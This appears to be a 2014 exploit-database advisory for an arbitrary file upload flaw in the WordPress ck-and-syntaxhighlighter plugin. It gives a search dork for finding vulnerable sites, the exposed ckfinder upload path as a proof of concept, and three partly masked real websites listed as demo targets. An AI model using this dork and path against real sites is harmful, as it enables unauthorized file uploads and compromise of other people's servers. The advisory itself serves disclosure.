WordPress CK-And-SyntaxHighLighter Arbitrary File Upload

2014.08.13
Credit: Hekt0r
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264
Dork: inurl:/wp-content/plugins/ck-and-syntaxhighlighter/

[+] Title: Wordpress ck-and-syntaxhighlighter Plugin RFU vulnerability [+] Date: 2014-08-12 [+] Author: Hekt0r [+] Tested on: Windows7 & Kali Linux [+] Vendor Homepage: http://wordpress.org/ [+] Software Link: http://wordpress.org/plugins/ck-and-syntaxhighlighter/ [+] Dork : inurl:/wp-content/plugins/ck-and-syntaxhighlighter/ ### POC: http://localhost/wordpress/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html [+] File Uploaded: http://localhost/wordpress/wp-content/uploads/ckfinder/files/file.txt ### Demo: http://www.tourXgueniev.fr/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html http://www.neiXhuecc.org/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html http://blog.itXacm.cn/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html ### Credits: [+] Special Thanks: Root SmasheR, Mr.Moein, UmPire, Qzz, Ali Ahmady, Saeed.Jok3r M4hdi, Vahid H±cĸer, BlackErroR, Phantom.S3c And All members of Iran Security Group [+] iransec.net


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top